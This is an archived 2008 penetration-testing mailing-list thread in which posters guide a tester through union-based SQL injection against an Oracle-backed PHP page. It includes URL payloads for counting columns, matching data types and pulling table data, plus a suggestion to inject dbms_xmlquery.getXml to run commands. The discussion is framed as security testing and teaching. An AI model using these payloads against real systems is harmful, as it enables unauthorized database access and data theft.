Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: Cesar <cesarc56 () yahoo com>
Date: Wed, 23 Jan 2008 15:37:01 -0800 (PST)
Hi I would recommend first trying to get the source code if possible : http://x.y.z.a/dbs.inc but I guess it won't work it should be a secure web server :) Anyways depending on the Oracle version you can easily own it, you just need to inject a function and exploit some known sql injection in Oracle or depending on permissions you can just run any commands. http://x.y.z.a/item.php?Id=length(dbms_xmlquery.getXml('your favority sql injection exploit here or any command')) Look at : http://www.argeniss.com/research/HackingDatabases.zip http://www.argeniss.com/research/OracleSQLInjBHUSA05.zip Cesar. --- Clone <c70n3 () yahoo co in> wrote:
Thanks Jeff & everyone. I've moved further after your emails. Really much appreciated. With Jeff's input below I enumerate that there are 2 columns. This time I gave
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
Now I get following error: ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01790: expression must have same datatype as corresponding expression in dbs.inc on line 44 The I tried following:
http://x.y.z.a/item.php?Id=90%20union%20select%201,'a'%20from%20usr
http://x.y.z.a/item.php?Id=90%20union%20select%201,1%20from%20usr
And get the error ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-00911: invalid character in dbs.inc on line 44 The functionality of the page is to generate an email page/forum email page. Any idea what's next? --- jeffrey rivero <jeffr76 () yahoo com> wrote:Hello all in your Union start by finding out how manycolumnsthere are ie.
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4 then once you have that get the data types
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string and so on then you can start to get real data from thetablesor
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--
Jeff Clone wrote:Hey List I am pen testing a web app that supplies sql parameters on the URL something like http://x.y.z.a/item.php?Id=90 I did blind sql injection by adding AND 1=1 toconfirmthe vulnerability. Now when I do http://x.y.z.a/item.php?Id=90' I get ociparse() [function.ociparse]: OCIParse:ORA-01756:quoted string not properly terminated initem.phponline 312 Then I tried (after confirming presence of usrtablename)
http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
and I get the error ociexecute() [function.ociexecute]:OCIStmtExecute:ORA-01789: query block has incorrect number ofresultcolumns in dbs.inc on line 44 I know one valid user account in the oracle DB. Any idea what's the best strategy to moveforward?I'm not getting any further from here so far. Any advise / helpo would be much appreciated. Cheers' 5, 50, 500, 5000 - Store N number of mailsin your inbox. Go to
http://help.yahoo.com/l/in/yahoo/mail/yahoomail/tools/tools-08.html
------------------------------------------------------------------------
This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solutionFREE today!http://www.cenzic.com/downloads
------------------------------------------------------------------------
Chat on a cool, new interface. No download required. Go to http://in.messenger.yahoo.com/webmessengerpromo.php
------------------------------------------------------------------------
This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads
------------------------------------------------------------------------
____________________________________________________________________________________ Never miss a thing. Make Yahoo your home page. http://www.yahoo.com/r/hs ------------------------------------------------------------------------ This list is sponsored by: Cenzic Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today! http://www.cenzic.com/downloads ------------------------------------------------------------------------
Current thread:
- Oracle URL SQL Injection issue Clone (Jan 18)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Cesar (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Jason Thompson (Jan 22)
- Re: Oracle URL SQL Injection issue Francois Larouche (Jan 22)
- Re: Oracle URL SQL Injection issue Danux (Jan 22)
- RE: Oracle URL SQL Injection issue Thakrar, Saurabh (Jan 22)
- Re: Oracle URL SQL Injection issue David Howe (Jan 23)
- Re: Oracle URL SQL Injection issue Joe Yong (Jan 22)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Joxean Koret (Jan 23)
- Re: Oracle URL SQL Injection issue Clone (Jan 22)
- Re: Oracle URL SQL Injection issue Todd Manning (Jan 22)
- <Possible follow-ups>
- Re: Oracle URL SQL Injection issue Clone (Jan 23)
- Re: Oracle URL SQL Injection issue jeffrey rivero (Jan 22)